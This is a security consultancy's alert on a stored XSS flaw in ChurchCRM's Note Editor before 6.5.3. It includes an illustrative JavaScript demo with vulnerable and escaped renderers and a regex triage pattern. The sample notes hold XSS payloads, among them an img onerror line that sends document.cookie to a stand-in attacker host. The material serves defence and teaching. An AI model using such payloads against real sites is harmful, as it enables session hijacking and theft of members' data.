


Perceptive Security
SOC/SIEM Consultancy

ChurchCRM is an open-source church management system. Prior to 6.5.3, a stored Cross-Site Scripting (XSS) vulnerability in ChurchCRM's Note Editor allows authen…
Published:
6 April 2026 at 22:00:00
Alert date:
7 April 2026 at 18:06:01
Source:
nvd.nist.gov
Web Technologies, Enterprise Applications
ChurchCRM, an open-source church management system, contains a stored Cross-Site Scripting (XSS) vulnerability in its Note Editor component in versions prior to 6.5.3. An authenticated user who holds note-adding permissions can save a note containing JavaScript; because the note body is later rendered without adequate output encoding, that script executes in the browser of every user who views the note, including administrators. A successful attack can lead to session hijacking, privilege escalation through actions performed in the victim's session, and unauthorized access to sensitive church member data. The issue has been resolved in version 6.5.3.
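The following is an added example and not ChurchCRM's own code: it models the class of bug described above with a toy note store, showing the vulnerable rendering pattern next to its hardened form, plus a crude heuristic for triaging already-stored notes after the upgrade. The note layout, field names and sample payloads are all assumptions constructed for the example; ChurchCRM's actual Note Editor internals are not reproduced here.

```javascript
// Added example (not ChurchCRM code). The note shape {id, author, text} and
// the sample payloads below are constructed for illustration only.

// Constructed sample notes, as a low-privileged user with note-adding rights
// might save them. Notes 2 and 3 carry script-bearing markup.
const NOTES = [
  { id: 1, author: "volunteer", text: "Called the family, follow up next week." },
  { id: 2, author: "volunteer",
    text: "<img src=x onerror=\"fetch('https://attacker.invalid/?c=' + document.cookie)\">" },
  { id: 3, author: "volunteer", text: "<script>alert(document.cookie)</script>" },
];

// Vulnerable pattern: the stored note body is concatenated straight into the
// page, so whatever HTML the author typed reaches the browser of whoever
// views the note (for example an administrator) and is executed there.
function renderNoteUnsafe(note) {
  return `<div class="note"><b>${note.author}</b>: ${note.text}</div>`;
}

// Hardened pattern: encode the characters that can open a tag or break out
// of an attribute, so the note is displayed as literal text.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function renderNoteSafe(note) {
  return `<div class="note"><b>${escapeHtml(note.author)}</b>: ${escapeHtml(note.text)}</div>`;
}

// Post-upgrade audit heuristic: flag stored notes that contain active content
// (script tags, inline event handlers, javascript: URLs, embedding elements).
// Regex-based on purpose; it is a triage aid for a human reviewer, not a
// security boundary, and will miss obfuscated payloads.
const ACTIVE_CONTENT = /<\s*script\b|\bon[a-z]+\s*=|javascript\s*:|<\s*(iframe|object|embed|svg)\b/i;

function findSuspiciousNotes(notes) {
  return notes.filter((n) => ACTIVE_CONTENT.test(n.text)).map((n) => n.id);
}

// Demo: compare both renderings and list the notes worth inspecting.
for (const n of NOTES) {
  console.log("unsafe:", renderNoteUnsafe(n));
  console.log("safe:  ", renderNoteSafe(n));
}
console.log("suspicious note ids:", findSuspiciousNotes(NOTES));
```

Two practical points follow from this. First, output encoding is the right fix when notes are plain text; if the editor is meant to accept rich text, encoding would break legitimate formatting and a server-side allowlist HTML sanitizer is the appropriate control instead, ideally backed by a Content-Security-Policy that blocks inline script. Second, a stored XSS payload lives in the database, so after upgrading to 6.5.3 it is worth scanning existing notes (as the heuristic above does) and reviewing administrator sessions created around the time any suspicious note was saved.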
Technical details
Mitigation steps:
Upgrade ChurchCRM to version 6.5.3 or later, which resolves the issue.
Affected products:
ChurchCRM
Related links:
https://nvd.nist.gov/vuln/detail/CVE-2026-35574
https://github.com/ChurchCRM/CRM/security/advisories/GHSA-cx82-8xrh-7f5c
Related CVEs:
Related threat actors:
IOCs:
This article was created with the assistance of AI technology by Perceptive.
